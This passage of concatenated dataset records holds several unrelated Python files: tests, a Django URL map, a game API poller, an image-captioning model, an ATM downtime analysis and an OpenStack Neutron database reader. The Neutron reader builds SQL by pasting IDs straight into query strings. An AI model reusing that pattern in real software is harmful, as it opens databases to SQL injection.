difference.details\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_internal_diff(dot_dsc_differences):\n assert dot_dsc_differences[1].source1 == 'test_1.tar.gz'\n\n@pytest.mark.skipif(miss_debian_module, reason='debian module is not installed')\ndef test_dot_dsc_compare_non_existing(monkeypatch, dot_dsc1):\n monkeypatch.setattr(Config.general, 'new_file', True)\n difference = dot_dsc1.compare(NonExistingFile('/nonexisting', dot_dsc1))\n output_text(difference, print_func=print)\n assert difference.source2 == '/nonexisting'\n assert difference.details[-1].source2 == '/dev/null'\n","repo_name":"edolstra/diffoscope","sub_path":"tests/comparators/test_debian.py","file_name":"test_debian.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"73773737691","text":"\"\"\"multisearch URL Configuration\n\nConfigure URL for endpoints:\n/site/\n/site/:site_id/\n/search/:site_id?term=foo\n\"\"\"\n\n\nfrom django.conf.urls import url\nfrom .views.api import (\n search,\n sites,\n site,\n)\n\n\nurlpatterns = [\n url(r'^search/(?P\\w+).*$', search, name=\"search\"),\n url(r'^site/$', sites, name=\"sites\"),\n url(r'^site/(?P\\w+)/$', site, name=\"site\"),\n]","repo_name":"jdeveloperw/multisearch","sub_path":"server/multisearch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"27298147498","text":"import requests\nimport threading, time\nimport GLOBAL_CONFIG\nDEBUG_LOG = False\n\nAPI_KEY = GLOBAL_CONFIG.API_KEY\nAPI_FACTION_ID = \"36134\"\nAPI_CHAIN_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=chain&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_FACTION_REQUEST_URL = \"https://api.torn.com/faction/%s?selections=&key=%s\" % (API_FACTION_ID, API_KEY)\nAPI_REQUEST_TIME_INTERVAL = 5\n\nsession = requests.session()\nif GLOBAL_CONFIG.USE_PROXIES:\n session.proxies = GLOBAL_CONFIG.proxies\n\nfaction_name = \"\"\nchain_current = -1\nchain_max = -1\nchain_timeout = -1\nchain_last_update_timestamp = -1\n\n\ndef debug_log_chain_state():\n if DEBUG_LOG:\n print(chain_current, chain_max, chain_timeout)\n\n\ndef chain_detail_info_make() -> str:\n return 'faction: %s\\n当前chain: %d\\n最大chain: %d\\n剩余时间: %d秒\\n预估剩余时间:%d秒\\n距离上次更新已过去:%d秒' % (faction_name, chain_current, chain_max, chain_timeout, (chain_timeout - (time.time()-chain_last_update_timestamp)), time.time()-chain_last_update_timestamp)\n\n\ndef chain_simple_info_make() -> str:\n return '当前chain: %d\\n最大chain: %d\\n预估剩余时间:%d' % ( chain_current, chain_max, (chain_timeout - (time.time()-chain_last_update_timestamp)))\n\n\ndef update_faction_state():\n global faction_name\n r = requests.get(API_FACTION_REQUEST_URL).json()\n try:\n faction_name = r[\"name\"]\n except Exception as e:\n faction_name = \"\"\n\n\ndef update_chain_state():\n global chain_current, chain_max, chain_timeout, chain_last_update_timestamp\n r = session.get(API_CHAIN_REQUEST_URL).json()\n try:\n new_chain_current = r[\"chain\"][\"current\"]\n new_chain_max = r[\"chain\"][\"max\"]\n new_chain_timeout = r[\"chain\"][\"timeout\"]\n new_chain_timestamp = -1\n\n if (new_chain_current != chain_current) or (new_chain_max != chain_max) or (new_chain_timeout != chain_timeout):\n # 有新信息 更新last_update_timestamp\n new_chain_timestamp = time.time()\n else:\n # 没有新信息 不更新last_update_timestamp\n new_chain_timestamp = chain_last_update_timestamp\n\n chain_current = new_chain_current\n chain_max = new_chain_max\n chain_timeout = new_chain_timeout\n chain_last_update_timestamp = new_chain_timestamp\n\n except Exception as e:\n chain_current = -1\n chain_max = -1\n chain_timeout = -1\n chain_last_update_timestamp = -1\n\n\ndef api_life_cycle():\n while 1:\n try:\n if faction_name == \"\":\n update_faction_state()\n update_chain_state()\n debug_log_chain_state()\n except Exception as e:\n print(e)\n print('api.center.heartbeat')\n time.sleep(API_REQUEST_TIME_INTERVAL)\n\n\ndef commence_life_cycle():\n # 不要多次调用\n thread = threading.Thread(target=api_life_cycle)\n thread.start()","repo_name":"mirrorsysu/iTorn_source","sub_path":"torn/APICenter.py","file_name":"APICenter.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"11670794425","text":"\"\"\"Model and feature extraction logic.\"\"\"\nfrom omegaconf import DictConfig\nfrom transformers import (GPT2Tokenizer, PreTrainedModel, PreTrainedTokenizer,\n VisionEncoderDecoderModel, ViTFeatureExtractor)\n\n\ndef get_feature_extractor(\n pretrained_feature_extractor: str,\n) -> ViTFeatureExtractor:\n \"\"\"Get a pretrained ViT feature extractor by the given name.\n\n Args:\n pretrained_feature_extractor: The pretrained ft name.\n\n Returns:\n The pretrained feature ViT extractor.\n \"\"\"\n return ViTFeatureExtractor.from_pretrained(\n pretrained_feature_extractor,\n )\n\n\ndef get_tokenizer(\n pretrained_tokenizer: str,\n) -> GPT2Tokenizer:\n \"\"\"Get a pretrained GPT2 tokenizer by the given name.\n\n Args:\n pretrained_tokenizer: The pretrained tokenizer name.\n\n Returns:\n The pretrained GPT2 tokenizer.\n \"\"\"\n tokenizer = GPT2Tokenizer.from_pretrained(\n pretrained_tokenizer, use_fast=True,\n )\n tokens_to_add = {\n 'pad_token': '[PAD]',\n 'bos_token': '[BOS]',\n 'eos_token': '[EOS]',\n }\n tokenizer.add_special_tokens(tokens_to_add)\n return tokenizer\n\n\ndef get_model(\n pretrained_encoder: str,\n pretrained_decoder: str,\n tokenizer: PreTrainedTokenizer,\n config: DictConfig,\n) -> PreTrainedModel:\n \"\"\"Get and configure a pretrained EncoderDecoder model.\n\n Args:\n pretrained_encoder: Pretrained encoder name.\n pretrained_decoder: Pretrained decoder name.\n tokenizer: Pretrained tokenizer for encoder.\n config: Model configuration.\n\n Returns:\n VisionEncoder decoder from pretrained parts with applied configuration.\n \"\"\"\n model = VisionEncoderDecoderModel.from_encoder_decoder_pretrained(\n pretrained_encoder, pretrained_decoder,\n )\n\n model.config.decoder_start_token_id = tokenizer.bos_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n\n model.decoder.resize_token_embeddings(len(tokenizer))\n model.config.vocab_size = model.config.decoder.vocab_size\n\n model.config.max_length = config.max_length\n model.config.num_beams = config.num_beams\n model.config.num_beam_groups = config.num_beam_groups\n model.config.early_stopping = config.early_stopping\n model.config.no_repeat_ngram_size = config.no_repeat_ngram_size\n model.config.length_penalty = config.length_penalty\n model.config.repetition_penalty = config.repetition_penalty\n model.config.diversity_penalty = config.diversity_penalty\n\n return model\n","repo_name":"EgSergeenko/product-images-captioning","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11937636964","text":"import datetime as dt\nimport time as tm\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series\nfrom pandas.core.frame import DataFrame\nfrom progressbar import ProgressBar\n\nimport project.date_range as dr\nfrom project.pd import df_cartesian\nfrom project.pd.datasource.orcl import DataFrameReaderOrcl\nimport project.atmserv.typ as typ\n\n\ndef get_order_day(df_order, df_day):\n df = df_cartesian(df_order, df_day)\n return df.loc[(df.DATE_REG <= df.DAY) & (df.DAY <= df.DATE_END)]\n\n\ndef set_group_func(df, series, col_name, func):\n\n for item in series.unique():\n cond = series == item # Булев массив для каждого уникального значения\n df.loc[cond, col_name] = func(item)\n\n\ndef get_in_repair(df_atm_order):\n i = 0\n in_repair_list = []\n grp_atm_order = df_atm_order.groupby(['ATM_REF', 'DAY', 'SW_BEG', 'SW_END'])[['DATE_REG', 'DATE_END']]\n bar = ProgressBar(max_value=len(grp_atm_order.size())).start()\n for (atm_ref, day, sw_beg, sw_end), grp in grp_atm_order:\n\n i += 1\n in_repair_day = []\n for order in grp.itertuples():\n\n (beg, end) = dr.inner_join([(sw_beg, sw_end), (order.DATE_REG, order.DATE_END)])\n if None not in [beg, end]:\n in_repair_day.append((beg, end))\n\n if i % 100 == 0:\n bar.update(i)\n\n in_repair_list.extend([(atm_ref, day, sw_beg, sw_end, *item) for item in dr.outer_join(in_repair_day) if item is not None])\n\n bar.finish()\n\n df_in_repair = pd.DataFrame(\n in_repair_list,\n columns=['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'REPAIR_BEG', 'REPAIR_END']\n )\n\n # df_in_repair['REPAIR_TIME'] = df_in_repair['REPAIR_END'] - df_in_repair['REPAIR_BEG']\n\n return df_in_repair\n\n\ndef get_service_window(df_atm, df_day):\n\n def time_to_td(time):\n return pd.Timedelta(hours=time.hour, minutes=time.minute)\n\n set_group_func(df_atm, df_atm.A_TIME_BEG, 'TD_SERVICE_BEG', time_to_td) # Timedelta от начала суток до начала обслуживания\n set_group_func(df_atm, df_atm.A_TIME_END, 'TD_SERVICE_END', time_to_td) # Timedelta от начала суток до окончания обслуживания\n\n # Рачет режима обслуживания по условиям дней недели\n df_atm_wd = df_cartesian(df_atm, pd.DataFrame({'WEEKDAY': [1, 2, 3, 4, 5, 6, 7]})) #.set_index(['ATM_REF', 'WEEKDAY'], False)\n cond = df_atm_wd.WEEKDAY > df_atm_wd.A_DAYS\n df_atm_wd.loc[cond, 'TD_SERVICE_BEG'] = pd.to_timedelta(0)\n df_atm_wd.loc[cond, 'TD_SERVICE_END'] = pd.to_timedelta(0)\n\n # Режим доступности УС сводится к двум полям (AVAIL_BEG и AVAIL_END) в разрезе недель\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_BEG'] = df_atm_wd.MON_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 1, 'TIME_AVAIL_END'] = df_atm_wd.MON_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_BEG'] = df_atm_wd.TUE_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 2, 'TIME_AVAIL_END'] = df_atm_wd.TUE_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_BEG'] = df_atm_wd.WED_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 3, 'TIME_AVAIL_END'] = df_atm_wd.WED_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_BEG'] = df_atm_wd.THU_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 4, 'TIME_AVAIL_END'] = df_atm_wd.THU_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_BEG'] = df_atm_wd.FRI_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 5, 'TIME_AVAIL_END'] = df_atm_wd.FRI_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_BEG'] = df_atm_wd.SAT_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 6, 'TIME_AVAIL_END'] = df_atm_wd.SAT_END\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_BEG'] = df_atm_wd.SUN_BEG\n df_atm_wd.loc[df_atm_wd.WEEKDAY == 7, 'TIME_AVAIL_END'] = df_atm_wd.SUN_END\n\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_BEG, 'TD_AVAIL_BEG', time_to_td)\n set_group_func(df_atm_wd, df_atm_wd.TIME_AVAIL_END, 'TD_AVAIL_END', time_to_td)\n\n # Получение данных в разрезе дней\n # df_atm_sw = pd.merge(df_atm_wd, df_day, 'outer', on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n df_atm_sw = pd.merge(df_atm_wd, df_day, on='WEEKDAY').set_index(['ATM_REF', 'DAY'], False).sort_index()\n # print(df_atm_sw.info())\n\n # Приведение к datetime\n df_atm_sw['SERVICE_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_BEG\n df_atm_sw['SERVICE_END'] = df_atm_sw.DAY + df_atm_sw.TD_SERVICE_END\n df_atm_sw['AVAIL_BEG'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_BEG\n df_atm_sw['AVAIL_END'] = df_atm_sw.DAY + df_atm_sw.TD_AVAIL_END\n\n # Обединение режимов обслуживания и доступности\n cond = df_atm_sw['AVAIL_BEG'] > df_atm_sw['SERVICE_BEG']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'AVAIL_BEG']\n df_atm_sw.loc[~cond, 'SW_BEG'] = df_atm_sw.loc[~cond, 'SERVICE_BEG']\n\n cond = df_atm_sw['AVAIL_END'] < df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'AVAIL_END']\n df_atm_sw.loc[~cond, 'SW_END'] = df_atm_sw.loc[~cond, 'SERVICE_END']\n\n cond = df_atm_sw['SERVICE_BEG'] >= df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'DAY']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'DAY']\n\n df_atm_sw['SW_TIME'] = df_atm_sw['SW_END'] - df_atm_sw['SW_BEG']\n\n # print(df_atm_sw)\n # df_atm_sw.to_csv('data/df_atm_sw.csv', sep='\\t')\n return df_atm_sw\n\n\ndef calc_idle(reader, date_beg, date_end):\n\n df_atm_all = reader.get_atm()\n df_service = reader.get_service(date_beg, date_end)\n df_order = reader.get_orders(date_beg, date_end)\n\n df_atm = df_service.merge(df_atm_all, on=['ATM_REF']) #.set_index('ATM_REF', False)\n\n # Список дат для анализа\n days = dr.date_list(date_beg, date_end)\n df_day = pd.DataFrame({'DAY':[d for d in days]})\n df_day.DAY = pd.to_datetime(df_day.DAY) # Приведение к datetime\n df_day['WEEKDAY'] = df_day.DAY.dt.weekday + 1 # Опорное поле дней недели\n\n df_atm_sw = get_service_window(df_atm, df_day) # Рсчет сервисного окна для каждого УС\n\n # Расчет времени ремонта УС по дням\n df_order_day = get_order_day(df_order, df_day)\n df_atm_order = pd.merge(df_atm_sw, df_order_day, on=['ATM_REF', 'DAY']) #.set_index(['ATM_REF', 'DAY'], False)\n df_in_repair = get_in_repair(df_atm_order) # Длительная операция\n\n # Расчет времени доступности УС по дням\n df_idle = pd.merge(\n df_atm_sw[['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'SW_TIME']],\n df_in_repair[['ATM_REF', 'DAY', 'REPAIR_BEG', 'REPAIR_END']],\n how='left',\n on=['ATM_REF', 'DAY']\n )\n df_idle['REPAIR_TIME'] = df_idle['REPAIR_END'] - df_idle['REPAIR_BEG']\n df_idle.loc[df_idle.REPAIR_TIME.isnull() & (df_idle.SW_TIME > pd.to_timedelta(0)), 'REPAIR_TIME'] = pd.to_timedelta(0)\n df_idle['AVAIL'] = 1 - (df_idle['REPAIR_TIME'] / df_idle['SW_TIME'])\n df_idle['DAY_DATE'] = df_idle.DAY.dt.date\n df_idle['DAY_MONTH'] = df_idle.DAY.dt.strftime('%Y.%m')\n df_idle['DAY_NUM'] = df_idle.DAY.dt.day\n\n # print(df_idle.info())\n # df_idle.to_csv('data/df_idle.csv', sep='\\t')\n\n df_atm_idle = df_atm[['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL']].merge(\n df_idle,\n how='left',\n on=['ATM_REF']\n # left_index=True,\n # right_index=True\n )\n\n df_atm_idle_pivot = df_atm_idle.pivot_table(index=['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL'], columns=['DAY_MONTH', 'DAY_NUM'], values=['AVAIL']) #.reset_index() #.set_index(['ATM_REF'])\n print(df_atm_idle_pivot)\n\n return df_atm_idle_pivot\n\n","repo_name":"privod/atm_chart","sub_path":"project/idle.py","file_name":"idle.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12395461593","text":"__author__ = 'gpetralia'\n\nimport json\nfrom contextlib import closing\nimport mysql.connector as MySQLdb\n\n# MAP driver name to Neutron agent name\nMAP_DRIVER_BINARY = {\n 'openvswitch': 'neutron-openvswitch-agent'\n}\n\n\nclass NeutronDb():\n \"\"\"\n Exposes methods to get information regarding Neutron resources.\n It manages the connection to the Neutron DB.\n \"\"\"\n def __init__(self, host, usr, pwd, db):\n self.conn = None\n self.conn = MySQLdb.connect(host=host,\n user=usr,\n passwd=pwd,\n db=db)\n\n def get_routers(self, uuid=None):\n \"\"\"\n Return a dict containing the routers stored in Glance.\n If an UUID is given, it will return only the router with the given UUID\n :param uuid: Optional UUID of the desired router\n :return dict: contains routers information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from routers left join ' \\\n 'routerl3agentbindings on routers.id = routerl3agentbindings.router_id'\n\n if uuid:\n query += ' where routers.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'router'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['status'] = row[3]\n res[row[1]]['attributes']['admin_state_up'] = row[4]\n res[row[1]]['attributes']['gw_port_id'] = row[5]\n res[row[1]]['attributes']['enable_snat'] = row[6]\n res[row[1]]['attributes']['l3_agent_id'] = row[8]\n res[row[1]]['attributes']['ports'] = []\n port_query = 'select * from routerports where router_id=\"' + row[1] + '\"'\n cur.execute(port_query)\n for port_row in cur.fetchall():\n res[row[1]]['attributes']['ports'].append(port_row[1])\n\n return res\n\n def get_floating_ips(self, uuid=None):\n \"\"\"\n Return a dict containing the FloatingIPs stored in Neutron.\n If an UUID is given, it will return only the FloatingIP with the given UUID\n :param uuid: Optional UUID of the desired FloatingIP\n :return dict: contains FloatingIPs information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n query = 'select * from floatingips'\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n res[row[1]]['type'] = 'floatingip'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['floating_ip_address'] = row[2]\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['port_id'] = row[4]\n res[row[1]]['attributes']['fixed_port_id'] = row[5]\n res[row[1]]['attributes']['router_id'] = row[7]\n sub_query = 'select mac_address from ports where id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['mac_address'] = sub_row[0]\n sub_query = 'select subnet_id from ipallocations where port_id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['subnet_id'] = sub_row[0]\n return res\n\n def get_ports_by_instance_uuid(self, instance_uuid):\n \"\"\"\n Return list of Neutron ports of the given nova instance.\n :param instance_uuid: UUID of the Nova Instance\n :return list: contains ports UUID\n \"\"\"\n res = []\n cur = self.conn.cursor()\n query = 'SELECT id FROM ports WHERE device_id = \"' + instance_uuid + '\"'\n cur.execute(query)\n for row in cur.fetchall():\n res.append(row[0])\n return res\n\n def get_ports(self, uuid=None):\n \"\"\"\n Return a dict containing the ports stored in Neutron.\n If an UUID is given, it will return only the port with the given UUID\n :param uuid: Optional UUID of the desired port\n :return dict: contains ports information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from ports where device_owner != \"network:floatingip\"'\n if uuid:\n query += ' and id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n if row[2] != '':\n res[row[1]]['name'] = row[2]\n\n res[row[1]]['type'] = 'port'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['mac_address'] = row[4]\n res[row[1]]['attributes']['admin_state_up'] = row[5]\n res[row[1]]['attributes']['status'] = row[6]\n res[row[1]]['attributes']['device_id'] = row[7]\n\n if row[8] != '':\n res[row[1]]['attributes']['device_owner'] = row[8]\n\n query = 'select * from ml2_port_bindings'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n if row[1] != '':\n res[row[0]]['hostname'] = row[1]\n res[row[0]]['attributes']['vif_type'] = row[2]\n res[row[0]]['attributes']['driver'] = row[3]\n res[row[0]]['attributes']['segment'] = row[4]\n res[row[0]]['attributes']['vnic_type'] = row[5]\n\n if row[6] != '':\n res[row[0]]['attributes']['vif_details'] = json.loads(row[6])\n if row[7] != '':\n res[row[0]]['attributes']['profile'] = row[7]\n\n query = 'select * from ipallocations'\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n res[row[0]]['attributes']['ip_address'] = row[1]\n res[row[0]]['attributes']['subnet_id'] = row[2]\n\n for port in res.keys():\n if res[port]['attributes']['vif_type'] != 'unbound':\n host = res[port]['hostname']\n if res[port]['attributes']['driver'] in MAP_DRIVER_BINARY.keys():\n driver = res[port]['attributes']['driver']\n query = 'select id from agents where agents.host=\"' + host + \\\n '\" and agents.binary=\"' + MAP_DRIVER_BINARY[driver] + '\" LIMIT 1;'\n cur.execute(query)\n for row in cur.fetchall():\n res[port]['attributes']['agent_id'] = row[0]\n\n query = 'select * from floatingips'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[5] in res.keys():\n if 'floatingips' not in res[row[5]]['attributes'].keys():\n res[row[5]]['attributes']['floatingips'] = []\n res[row[5]]['attributes']['floatingips'].append(row[1])\n\n return res\n\n def get_agents(self, uuid=None):\n \"\"\"\n Return a dict containing the Neutron agents stored in Neutron.\n If an UUID is given, it will return only the agent with the given UUID\n :param uuid: Optional UUID of the desired agent\n :return dict: contains agents information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from agents'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'service'\n res[row[0]]['name'] = row[1]\n res[row[0]]['hostname'] = row[4]\n res[row[0]]['category'] = 'network'\n res[row[0]]['type'] = row[2]\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['admin_state_up'] = row[5]\n res[row[0]]['attributes']['configurations'] = json.loads(row[10])\n return res\n\n def get_networks(self, uuid=None):\n \"\"\"\n Return a dict containing the networks stored in Neutron.\n If an UUID is given, it will return only the network with the given UUID\n :param uuid: Optional UUID of the desired network\n :return dict: contains networks information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select n.id, n.name, n.status, n.admin_state_up, n.shared from networks n'\n\n if uuid:\n query += ' where n.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'virtual'\n res[row[0]]['name'] = row[1]\n res[row[0]]['type'] = 'net'\n res[row[0]]['category'] = 'network'\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['status'] = row[2]\n res[row[0]]['attributes']['admin_state_up'] = row[3]\n res[row[0]]['attributes']['shared'] = row[4]\n subnets = self.get_subnets_by_net_id(row[0])\n if subnets and len(subnets) > 0:\n res[row[0]]['attributes']['subnets'] = subnets\n\n query = 'select m.network_id, m.network_type, m.physical_network, ' \\\n 'm.segmentation_id, m.is_dynamic from ml2_network_segments m'\n\n if uuid:\n query += ' where m.network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['network_type'] = row[1]\n res[row[0]]['attributes']['physical_network'] = row[2]\n res[row[0]]['attributes']['segmentation_id'] = row[3]\n res[row[0]]['attributes']['is_dynamic'] = row[4]\n\n query = 'select network_id, dhcp_agent_id from networkdhcpagentbindings'\n\n if uuid:\n query += ' where network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['dhcp_agent_id'] = row[1]\n\n return res\n\n def get_subnets_by_net_id(self, net_id):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron for a given Network.\n\n :param net_id: UUID of the desired Network\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets where network_id = \"' + net_id + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['name'] = row[2]\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n\n def get_subnets(self, uuid=None):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron.\n If an UUID is given, it will return only the subnet with the given UUID\n :param uuid: Optional UUID of the desired subnet\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'subnet'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n","repo_name":"IntelLabsEurope/infrastructure-repository","sub_path":"monitoring_service/epa_database/openstack/neutron_db.py","file_name":"neutron_db.py","file_ext":"py","file_size_in_byte":15327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70831511773","text":"import random\n\nimport pyglet\nfrom pyglet.window import key\n\nclass _Shield(object):\n def __init__(self, x, y):\n self.x, self.y = x, y\n self.sprites = [\n None,\n pyglet.resource.image('shield_damlo.png'),\n pyglet.resource.image('shield_damhi.png'),\n pyglet.resource.image('shield_full.png'),\n pyglet.resource.image('shield_nw.png'),\n pyglet.resource.image('shield_ne.png'),\n ]\n self.states = [\n [0, 4, 3, 3, 3, 3, 5, 0],\n [4, 3, 3, 3, 3, 3, 3, 5],\n [3, 3, 0, 0, 0, 0, 3, 3],\n [3, 3, 0, 0, 0, 0, 3, 3],\n ]\n self.IW = self.sprites[3].width\n self.IH = self.sprites[3].height\n self.RC = range(len(self.states))\n self.CC = range(len(self.states[0]))\n self.width = len(self.states[0]) * self.IW\n def update(self):\n pass\n def paint(self):\n for s_r in self.RC:\n for s_c in self.CC:\n s = self.sprites[self.states[s_r][s_c]]\n x = self.x + s_c * self.IW\n y = self.y - s_r * self.IH\n if s: s.blit(x, y)\n def _reducedState(self, s, fromAbove):\n if s in [1, 2]:\n return 0\n elif s in [3, 4, 5]:\n return {True:1,False:2}[fromAbove]\n else:\n assert False\n def top(self):\n return self.y + self.IH\n def absorb(self, xl, yl, xh, yh, fromAbove):\n x = (xl + xh) / 2\n for r in self.RC:\n ry = self.y - r * self.IH\n if yl >= ry + self.IH: continue\n if yh < ry: continue\n for c in self.CC:\n cx = self.x + c * self.IW\n if not self.states[r][c]: continue\n if x < cx: continue\n if x >= cx + self.IW: continue\n s = self.states[r][c]\n self.states[r][c] = self._reducedState(s, fromAbove)\n return True\n def height(self):\n return self.IH * len(self.RC)\n def bitHeight(self):\n return self.IH\n def melt(self, invaderInvasionY):\n anythingMelted = False\n row = invaderInvasionY // self.IH\n if row < 0:\n return anythingMelted\n if row > 